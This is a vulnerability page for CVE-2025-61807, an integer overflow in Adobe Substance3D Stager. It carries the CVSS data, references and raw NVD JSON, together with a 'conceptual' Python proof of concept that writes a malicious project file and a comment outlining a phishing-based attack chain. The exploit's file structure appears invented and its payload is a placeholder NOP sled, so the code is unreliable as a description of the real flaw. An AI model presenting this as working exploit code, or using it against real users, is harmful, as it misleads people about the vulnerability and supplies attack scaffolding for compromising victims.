CVE-2025-61807

Description

Substance3D - Stager versions 3.1.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file.

CVSS Details

CVSS Score

7.8

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Configurations (Affected Products)

cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:* - NOT VULNERABLE

cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:* - NOT VULNERABLE

Adobe Substance3D Stager <= 3.1.4

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

# CVE-2025-61807 PoC - Conceptual Proof of Concept
# Integer Overflow in Adobe Substance3D Stager
# WARNING: This is a conceptual PoC for educational purposes only.

import struct
import os

def create_malicious_file(output_path):
    """
    Create a malicious Substance3D Stager file that triggers
    integer overflow vulnerability (CVE-2025-61807).
    
    The vulnerability is triggered when parsing specific numeric
    fields in the project/scene file. By providing values that cause
    integer overflow during internal calculations, we can trigger
    memory corruption leading to arbitrary code execution.
    """
    
    # File header (simplified representation of a Stager project file)
    header = b'SBSSTAGER\x00'  # Magic bytes
    header += struct.pack('<I', 0x00010001)  # Version 1.1
    
    # Crafted numeric field that triggers integer overflow
    # When the parser multiplies this value internally,
    # it overflows the 32-bit integer range
    overflow_value = 0x7FFFFFFF  # Maximum signed 32-bit integer
    
    # Payload structure designed to cause overflow during processing
    payload = b''
    payload += struct.pack('<I', overflow_value)  # Width causing overflow
    payload += struct.pack('<I', overflow_value)  # Height causing overflow
    payload += struct.pack('<I', 0x00000002)      # Channel multiplier
    
    # The multiplication overflow_value * overflow_value * 2
    # will wrap around, causing a small buffer allocation
    # while large data follows
    
    # Malicious shellcode or payload (placeholder)
    # In a real exploit, this would contain shellcode
    # that executes when the buffer overflow occurs
    malicious_data = b'\x90' * 4096  # NOP sled (placeholder)
    
    with open(output_path, 'wb') as f:
        f.write(header)
        f.write(payload)
        f.write(malicious_data)
    
    print(f"[+] Malicious file created: {output_path}")
    print(f"[!] When opened in Substance3D Stager <= 3.1.4,")
    print(f"    this file triggers CVE-2025-61807")

if __name__ == '__main__':
    create_malicious_file('exploit.sbsar')
    
    # Attack chain:
    # 1. Attacker crafts malicious Stager file with overflow values
    # 2. Attacker distributes file via phishing/social engineering
    # 3. Victim opens file in Substance3D Stager
    # 4. Integer overflow occurs during file parsing
    # 5. Buffer overflow leads to arbitrary code execution
    # 6. Attacker code runs with victim's privileges

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-61807
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-61807
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-61807/
[4] VulDB https://vuldb.com/cve/CVE-2025-61807
[5] https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-61807", "sourceIdentifier": "[email protected]", "published": "2025-10-14T20:15:53.403", "lastModified": "2025-10-16T17:37:33.997", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Substance3D - Stager versions 3.1.4 and earlier are affected by an Integer Overflow or Wraparound vulnerability that could result in arbitrary code execution in the context of the current user. Exploitation of this issue requires user interaction in that a victim must open a malicious file."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-190"}]}], "configurations": [{"operator": "AND", "nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:adobe:substance_3d_stager:*:*:*:*:*:*:*:*", "versionEndExcluding": "3.1.5", "matchCriteriaId": "AB3C6EBF-2CF4-413D-AC6B-AAF49BA08B2F"}]}, {"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": false, "criteria": "cpe:2.3:o:apple:macos:-:*:*:*:*:*:*:*", "matchCriteriaId": "387021A0-AF36-463C-A605-32EA7DAC172E"}, {"vulnerable": false, "criteria": "cpe:2.3:o:microsoft:windows:-:*:*:*:*:*:*:*", "matchCriteriaId": "A2572D17-1DE6-457B-99CC-64AFD54487EA"}]}]}], "references": [{"url": "https://helpx.adobe.com/security/products/substance3d_stager/apsb25-104.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}